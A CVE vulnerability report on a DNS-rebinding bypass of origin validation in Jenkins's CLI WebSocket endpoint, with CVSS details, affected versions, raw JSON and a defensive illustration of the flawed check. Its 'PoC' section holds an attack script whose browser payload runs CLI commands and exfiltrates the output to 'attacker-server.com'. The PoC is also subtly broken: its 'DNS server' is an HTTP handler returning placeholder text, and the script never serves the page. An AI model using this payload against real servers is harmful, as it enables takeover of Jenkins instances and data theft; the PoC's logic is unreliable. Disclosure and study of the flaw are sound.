Security Vulnerability Report
CVE-2026-33002 CVSS 7.5 HIGH

CVE-2026-33002

Published: 2026-03-18 16:16:28
Last Modified: 2026-03-21 00:18:44

Description

Jenkins 2.442 through 2.554 (both inclusive), LTS 2.426.3 through LTS 2.541.2 (both inclusive) performs origin validation of requests made through the CLI WebSocket endpoint by computing the expected origin for comparison using the Host or X-Forwarded-Host HTTP request headers, making it vulnerable to DNS rebinding attacks that allow bypassing origin validation.
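The flaw described above, modelled as an added example (not Jenkins code and not part of the original record): an origin check whose expected value is built from the request's own Host or X-Forwarded-Host header accepts a rebound name, while a check against a server-side configured URL rejects it. The hostnames, `CONFIGURED_ROOT_URL` and all function names are constructed for illustration, and comparing against a configured URL is shown as a general mitigation pattern, not as the vendor's actual patch.

```python
from urllib.parse import urlsplit

# Assumed, constructed value: the URL an administrator configured for the server.
CONFIGURED_ROOT_URL = "https://jenkins.example.internal/"

def origin_of(url):
    """Normalise a URL to scheme://host[:port]; return None if it cannot be parsed."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return None
    scheme, host = parts.scheme.lower(), (parts.hostname or "").lower()
    if scheme not in ("http", "https") or not host:
        return None
    if port in (None, {"http": 80, "https": 443}[scheme]):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"

def header_derived_check(headers, scheme):
    """Flawed pattern: the expected origin is built from client-supplied headers."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    origin = origin_of(headers.get("Origin", ""))
    return origin is not None and origin == origin_of(f"{scheme}://{host}")

def configured_check(headers, root_url=CONFIGURED_ROOT_URL):
    """Hardened pattern: the expected origin comes only from server-side config."""
    origin = origin_of(headers.get("Origin", ""))
    return origin is not None and origin == origin_of(root_url)

# Constructed handshake headers (exact-case keys for brevity; real HTTP is case-insensitive).
SAMPLES = {
    "same-site UI": ({"Origin": "https://jenkins.example.internal",
                      "Host": "jenkins.example.internal"}, "https"),
    "plain cross-site": ({"Origin": "https://other.example.org",
                          "Host": "jenkins.example.internal"}, "https"),
    # After rebinding, the browser still sends the page's own name in both headers.
    "rebound name": ({"Origin": "http://rebind.example.net:8080",
                      "Host": "rebind.example.net:8080"}, "http"),
}

def evaluate():
    """Return {case: (header_derived_result, configured_result)}."""
    return {name: (header_derived_check(h, s), configured_check(h))
            for name, (h, s) in SAMPLES.items()}

if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:18} header-derived={result[0]!s:5} configured={result[1]}")
```

The header-derived check stops an ordinary cross-site request but not the rebound one, because Origin and Host are then both the same externally controlled name.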

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:* - VULNERABLE
Jenkins 2.442 <= version <= 2.554
Jenkins LTS 2.426.3 <= version <= 2.541.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-33002 - Jenkins CLI WebSocket DNS Rebinding PoC

This PoC demonstrates the DNS rebinding attack against Jenkins CLI WebSocket endpoint.
Note: This is for educational and authorized testing purposes only.
"""

import http.server
import socketserver
import threading
import time
import socket

# Configuration
JENKINS_TARGET = "http://target-jenkins-server:8080"
ATTACKER_DOMAIN = "attacker-controlled-domain.com"


class MaliciousDNSHandler(http.server.BaseHTTPRequestHandler):
    """
    Custom DNS handler that returns different IPs based on query count.
    First queries return attacker's IP, then switch to target Jenkins IP.
    """
    query_count = 0

    def do_GET(self):
        if "/dns-query" in self.path or self.path == "/":
            MaliciousDNSHandler.query_count += 1
            if MaliciousDNSHandler.query_count <= 2:
                # First queries return attacker's IP (for initial page load)
                self.send_response(200)
                self.send_header('Content-Type', 'text/plain')
                self.end_headers()
                self.wfile.write(b"attacker-controlled-ip")
            else:
                # Subsequent queries return target Jenkins IP
                self.send_response(200)
                self.send_header('Content-Type', 'text/plain')
                self.end_headers()
                self.wfile.write(b"target-jenkins-ip")

    def log_message(self, format, *args):
        pass  # Suppress logging


def start_malicious_dns_server(port=8053):
    """Start DNS server for rebinding attack."""
    with socketserver.TCPServer(('', port), MaliciousDNSHandler) as httpd:
        httpd.handle_request()


def create_malicious_page():
    """Generate malicious HTML page that initiates WebSocket connection."""
    return f"""
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
<script>
// Wait for DNS cache to expire and rebind
setTimeout(function() {{
    // Initiate WebSocket connection to Jenkins CLI
    // The DNS will now resolve to the target Jenkins server
    const ws = new WebSocket(
        'ws://{ATTACKER_DOMAIN}:8080/cli',
        ['jenkins-cli-cli']
    );

    ws.onopen = function() {{
        console.log('WebSocket connected');
        // Send CLI commands through WebSocket
        ws.send('who-am-i');
    }};

    ws.onmessage = function(event) {{
        // Exfiltrate data to attacker server
        fetch('https://attacker-server.com/exfil?data=' + btoa(event.data));
    }};

    ws.onerror = function(error) {{
        console.error('WebSocket error:', error);
    }};
}}, 5000); // Wait for DNS cache to clear
</script>
</body>
</html>
"""


def exploit():
    """
    Main exploit function for CVE-2026-33002
    """
    print("[*] CVE-2026-33002 - Jenkins DNS Rebinding Attack")
    print("[*] Target: " + JENKINS_TARGET)
    print("[*] Attacker Domain: " + ATTACKER_DOMAIN)

    # Step 1: Start DNS server
    dns_thread = threading.Thread(target=start_malicious_dns_server)
    dns_thread.daemon = True
    dns_thread.start()
    print("[+] Malicious DNS server started on port 8053")

    # Step 2: Serve malicious page
    print("[+] Serving malicious page to target user...")
    print("[*] When user visits the page and Jenkins is logged in,")
    print("[*] WebSocket connection will be established and CLI commands executed.")

    # Note: In real attack, the malicious page would be hosted on attacker-controlled server
    # and target user would be tricked into visiting it


if __name__ == "__main__":
    exploit()

References

https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3674 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33002", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.187", "lastModified": "2026-03-21T00:18:44.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.442 through 2.554 (both inclusive), LTS 2.426.3 through LTS 2.541.2 (both inclusive) performs origin validation of requests made through the CLI WebSocket endpoint by computing the expected origin for comparison using the Host or X-Forwarded-Host HTTP request headers, making it vulnerable to DNS rebinding attacks that allow bypassing origin validation."}, {"lang": "es", "value": "Jenkins 2.442 hasta 2.554 (ambos inclusive), LTS 2.426.3 hasta LTS 2.541.2 (ambos inclusive) realiza la validación de origen de las solicitudes realizadas a través del endpoint WebSocket de la CLI calculando el origen esperado para la comparación utilizando los encabezados de solicitud HTTP Host o X-Forwarded-Host, lo que lo hace vulnerable a ataques de reencuadernación de DNS que permiten eludir la validación de origen."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-350"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionStartIncluding": "2.426.3", "versionEndExcluding": "2.541.3", "matchCriteriaId": 
"B3638046-C2A7-4BEF-95E1-6E5C493DAA39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionStartIncluding": "2.442", "versionEndExcluding": "2.555", "matchCriteriaId": "7C72BD61-34BC-4609-9019-4C342792D538"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3674", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}